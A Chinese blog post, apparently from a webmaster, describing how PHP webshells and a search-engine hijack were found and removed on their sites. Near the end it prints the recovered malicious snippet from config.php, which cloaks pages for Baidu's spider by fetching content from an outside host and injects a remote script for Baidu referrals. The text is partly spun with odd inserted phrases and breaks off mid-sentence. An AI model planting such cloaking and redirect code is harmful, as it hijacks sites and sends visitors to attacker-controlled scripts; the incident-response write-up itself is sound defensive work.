如何解决网站被挂马(检查网站有没有被挂马)
发布时间:2026-09-30 13:36:08

记一次网站被挂马的何解原因排查(附处理过程)

记一次网站被挂马原因排查分析流程。昨天一台服务器被(bei)挂马(ma),决网检查幸好自己对服务器略有熟悉第一时间把(ba)隐藏在网站源码中的站被木马文件进行处理。相信站长SEO们在日常网站优化过程中经常(chang)会遇到网站被黑恶意(yi)劫持的挂马挂马问题。网站被挂马怎么处理(li),网站如何进行排查呢?有(you)没有(you)被

本文结合自(zi)己的处理流程(cheng)进行梳理并分享。

如何解决网站被挂马(检查网站有没有被挂马)

1)服务器防御性非常重要

多数站长选择便宜的何解不可靠的服务器,这往往最容易被入侵攻击。决网检查廉价的站被(bei)服务器机房基本上不会开启安全防护功能,入侵者利用漏洞轻松可以进行提权操作。挂马挂马(ma)

如何解决网站被挂马(检查网站有没有被挂马)

我本人一直使用大厂的网站服务器产品,推荐使用阿里云、有没有被腾讯云、何解百度云等,决网检查相(xiang)对来说比小厂有保障些。站被前些天我的(de)一台阿里云服务(wu)器收到安全风险提示短信,第(di)一时间登录阿里云后台,找到云盾系统消息提示发现后门webshell文件,如下图:

如何解决网站被挂马(检查网站有没有被挂马)

系统会(hui)提(ti)供具(ju)体的后门文件的路径位置,根据这些信息可以快速定位到网站程序中的PHP木马(ma)后门文件。如下图所示:

一般人还真不太好发现,藏的够深啊 ,还(hai)有很强(qiang)的模仿能(neng)力(li)。

这是第二个网页后门文件,命名跟其他图(tu)片一样,一般很(hen)难发现。下图所示

我进(jin)行了下载方便后面(mian)进一步的分析研究。建议立(li)即删除php后门文件。

电脑杀毒软件也进行了查杀报毒

2)彻底清查整站程序源码

一般情况下当网站被黑恶意跳转,百分百中(zhong)招应该做的就是针对网站进行彻底的清查。

具体(ti)方法,网站管(guan)理面板对站点进行打包下(xia)载,电脑本地使用网马查杀软件进(jin)行分析。

建议使用 D盾Web查杀(webshell查杀) 工(gong)具,如(ru)下图:

D盾webshell查杀软件

如(ru)果你对源码不了解,请联系你的网站开发人员或者(zhe)是模板制(zhi)作人员协助处理。(一般会收取费用)应该第一时间把隐藏的风险文件和(he)后门程序进行剔除。(记得网站原始数据进(jin)行(xing)备份)

确定处理干净之(zhi)后(hou)的(de)源码重(zhong)新传到网站主机当中,确保网站正确运行即可。

强化安全操作:

  • 修(xiu)改网站后台密码的复杂性和长度;

  • 修改(gai)FTP账号密码等信息;

  • 检查服务器的(de)安全日志修补漏洞 ;

  • 购买服务器厂商的安全防护类产品等;

3)分析网站后门Wehshell文件

为了进行研究和学习,我特意把查杀出来的几(ji)个后门文件进行分析:如下图

打开其中PHP后门文件查看(kan)代码

为了大家方(fang)便查看,把PHP后门放到本地PHP环境中运行给大家(jia)看看后门程序的功能。

密码就是上图的红框标记出来的,进行MD5解密后得到admins

入侵者通过自己的后(hou)门PHP入口,可以轻松获得你(ni)服务器主机的各种权限和操作,如下(xia)图:

吓出一身冷汗!!!

另外一个后门PHP文件登录后的界面和功能(neng)

严重性就不多说了,网站的安全性多么重要啊。做为站长SEO人员一定要及时发现漏洞和后(hou)门,及时处(chu)理(li)做好防护,后果不堪设想。

4)后续安全终极操作与防护

之前有写过(guo)一篇关于虚拟主机安全文章《网站被篡改劫持怎么修复》 有(you)兴趣可以(yi)点击进行查看。

我自己使用的是服务器,管理环境面板是宝塔,安装相应的防火墙和系统加(jia)固功能来实现。

提示,宝塔环境面板是目前服务器(qi)网站环境最(zui)好用的,建议新(xin)手服务器环境配置首选 宝塔BT面(mian)板。

这里有关使用的文章 BT.CN宝塔面板环境安装流程(图(tu)文教程)新手请查看(kan)。

相(xiang)关安全配置功能,在自己的(de)宝塔面板中可以购买开(kai)启,有(you)些功能需要购买付费。

(Nginx防火墙功能及配置图)

(宝塔网站防篡改功能及配置图2)

(宝塔系统加固功能及配置图3)

最后:关于一次服务器入(ru)侵后门网马(ma)的过程就分享这么多,切(qie)记一点,选择好的服务器,及时发现并监控网站安全,不要等到网站问题放大严重后果,百度惩罚流量(liang)下滑再处理就为时以晚了。

网站挂马劫持经典案例分析「黑链清除思路」

劫与被劫的网站遇过不少,时隔一年左右今天偶然又遇到一位网友求助的网站劫持(chi)问题,因为这个问(wen)题我竟然没有直接分析出挂马方式(shi),因为稍微有点特别今天想详细的给大家分解一下常规挂马方(fang)式与清理思路。

网站挂马劫持的必然性

一般情况下你的网站并不是被特地入侵的,一般出于报复专(zhuan)门入(ru)侵你(ni)的网站也不会明目张胆的来劫持。

所以一般网站劫持会被用(yong)来发布灰色广告,或者被用来做黑帽SEO。之所以你的网站被入侵,是挂马者使用批量getshell工具,根据(ju)某个漏洞来批量拿到具有相同漏洞的网站,然后再将相关(guan)劫持代码加入到你的(de)网站程序中,而这一系列动作都是用(yong)工具批量完(wan)成。

其实在我看来,如(ru)果发现你(ni)的网站被挂马劫持,你其实可以乐观一点,起码你会知(zhi)道你的网站存在严重的漏洞,却只是被工具劫持了,而不是被同行所利用,如果(guo)被专门的入侵者拿下,一般就不会简简单单的给你挂个马了,具(ju)体会严重的什么程度?这要看心情了,不开玩笑,而恰巧你又不太懂,如果木马隐藏的好,这匹马(ma)将伴随你终身,白头到老(lao)。

挂马(ma)症状

长话短说,一般你会在搜索结果搜索相关关键词,或者自己的网址,看到的标题可能不是自己的网站标题,点击进去可能会跳转到其他地方,或者进去后发现网站已物(wu)是人非。

如:

本来是一个PS网站标题(ti)变(bian)成羞羞的内容,而内容(rong)已经不(wo)堪(hen)入(xi)目(huan)

劫持分(fen)析

这种情况很明显挂马脚本对user-agent进行了判断,如果user-agent是百度蜘蛛,那么将返回广告。

一般会在网站程序插入JS,或者在(zai)php或者其他程序中插入代码,如果是js,一般只要远(yuan)程调用一个就可以实(shi)现劫持,插入代码量很少。

第一步:审核元素中查看网络连接

网站正常打开的时候先看看没有加载异常(chang)的脚本

其(qi)中加载的js都打开简单看(kan)下没有发现异常的脚本,这时(shi)候就有点慌了啊,没(mei)有引入外部脚本,那就可能隐藏在(zai)现有的JS中,一般隐藏也是加密后的,比较(jiao)难以发现,于是每个js文(wen)件按个检查一遍,依旧没有(you)任何发现。

第二步:抓包分析

第一步没有直接分析出来,一般要么马隐藏的深,要么就是根本不是用的JS,那么需要抓包分析,怎么抓?这里就不说那么多了,可以在我以前的(de)文章中(zhong)找找。

先重现跳转的情景:

设置浏览器user-agent 为百度蜘蛛,这里我祭上(shang)一个超级好用的(de)chrome插件

先用burpsuite抓一下看看(kan),不过要先配置下不过滤JS脚本,

配置好代(dai)理,回车,走你

get首页,肯定没毛病,forward一下,这一下就相当重要了,如(ru)果下一步抓到js,首页还没跳,说(shuo)明js搞鬼,而真相就是……没抓到js,出来直接抓到一个html页面,这个(ge)页面却是404,然后篡改的(de)首页直(zhi)接蹦出来了!

这说明?

说(shuo)明程序直接在加载首页文件,也就是index.php的时候就开始捣鬼了(le)。

至此可以判断为php挂马,在前端寻觅已(yi)经没有什么(me)有(you)用信息了(le)。

第三步:找木马

这时候妹纸把网站程序源码包发过来了(le),ps:妹纸防备着呢,不(bu)给服务器权限,但是(shi)给(gei)了源码还是给(gei)了一切啊!虽然没有什么可利(li)用的(de)地方,但我起码知道里面绝对藏着shell呢!

一般挂马(ma)程序都是会直接(jie)把黑链代码插到index.php中(zhong),不会判断太多,这种情况出现在企业站中比较多,所以很自然的(de)打开index.php,发现没有异常,也(ye)没有include异常php文件。

看到这里(li)瞬间觉得这个套路还是(shi)有点深(shen)度的,起码没那么明显。

继续找加载的文件(jian),这(zhe)时候脑洞大开,直接(jie)去(qu)找数(shu)据库配置文件,然后就(jiu)这么结束了这段捉马旅程,没错,马就(jiu)在(zai)config.php文件中

<?phpif(ereg("http://www.baidu.com/search/spider.htm",$_SERVER["HTTP_USER_AGENT"])){ $file=file_get_contents('http://z.*****.com/jie/70.html');echo$file;exit;}if(stristr($_SERVER['HTTP_REFERER'],"http://www.baidu.com")){ echo"<scriptlanguage='javascript'src='http://z.sloufeng.com/jc.js'></script><br/>";exit;}?>

简单分析一下,这(zhe)已经是最(zui)简单的(de)劫持代码了,判断user-aget 如果是百度蜘蛛,把网页:http://z.